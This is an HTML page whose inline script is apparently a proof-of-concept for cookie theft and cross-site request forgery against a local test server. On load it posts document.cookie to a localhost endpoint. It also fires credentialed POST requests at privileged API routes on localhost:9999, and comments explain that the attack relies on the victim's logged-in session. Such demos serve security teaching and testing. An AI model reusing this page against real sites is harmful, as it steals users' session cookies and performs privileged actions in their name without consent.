<html>
  <head>
    <script>

    document.onload=get_cookie();

    function get_cookie(){
      fetch ("http://localhost/cookie",{
        method: 'POST', 
        body: cookies=document.cookie
      })
    }

    // CSRF - trigger priv action needs logged in session
    // 1. User created a "login" session
    // 2. Land this page and reqeust to do action
    // 3. Since user has the session established, user can do action.

    document.onload=call_api();
    function call_api(){
      fetch ("http://localhost:9999/api/privaction",{
        method: 'POST',
        credentials: 'include'
      })
    }

    document.onload=call_cors_api();
    function call_cors_api(){
      fetch ("http://localhost:9999/api/corsprivaction",{
        method: 'POST',
        credentials: 'include'
      })
    }

    </script>
  </head>
  
    </html>